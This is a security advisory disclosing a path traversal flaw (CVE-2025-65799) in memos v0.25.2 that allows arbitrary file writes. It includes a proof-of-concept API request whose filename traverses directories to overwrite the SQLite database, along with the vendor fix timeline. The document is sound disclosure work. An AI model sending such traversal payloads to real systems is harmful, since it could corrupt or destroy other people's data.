usd-2025-56 | Arbitrary File Write via Path Traversal in memos
Product: memos
Affected Version: v0.25.2
Vulnerability Type: CWE-23: Relative Path Traversal
Security Risk: High
Vendor: usememos
Vendor URL: https://github.com/usememos/memos
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2025-65799
CVE Link: https://www.cve.org/CVERecord?id=CVE-2025-65799
Advisory ID: usd-2025-56
Description
Memos is a lightweight, self-hosted knowledge management and note-taking platform designed for personal use. The architecture features a Go backend paired with a React+Vite frontend, using gRPC for internal communication and providing REST API access through gRPC-Gateway. It supports multiple database backends (SQLite, MySQL, PostgreSQL) and includes features like file attachments, OAuth/SSO integration, activity logging, and internationalization.
When local storage is used for attachments, provided filenames are neither verified nor sanitized, allowing path traversal. This allows authenticated, low-privileged attackers to overwrite arbitrary files with chosen content. For example, if SQLite is used as database backend, an attacker can corrupt the database.
Proof of Concept
The following HTTP request uses the REST API to demonstrate the vulnerability.
POST /api/v1/attachments HTTP/1.1 Host: memos:5230 Content-Type: application/json Cookie: user_session=[... REDCATED ...] Content-Length: 59 { "filename":"Test/../../memos_prod.db", "type":"image/png" }
Note that for a full deletion of the database, the memos_prod.db-wal file must be overwritten as well.
Fix
A fix for the vulnerability has been submitted as pull request.
References
Timeline
- 2025-11-03: First contact request
- 2025-11-03: Pull request submitted
- 2025-11-05: Commit merged to main by vendor
- 2025-11-25: Version 0.25.3 was released
- 2025-12-03: This advisory is published
Credits
This security vulnerability was identified by Florian Dewald of usd AG.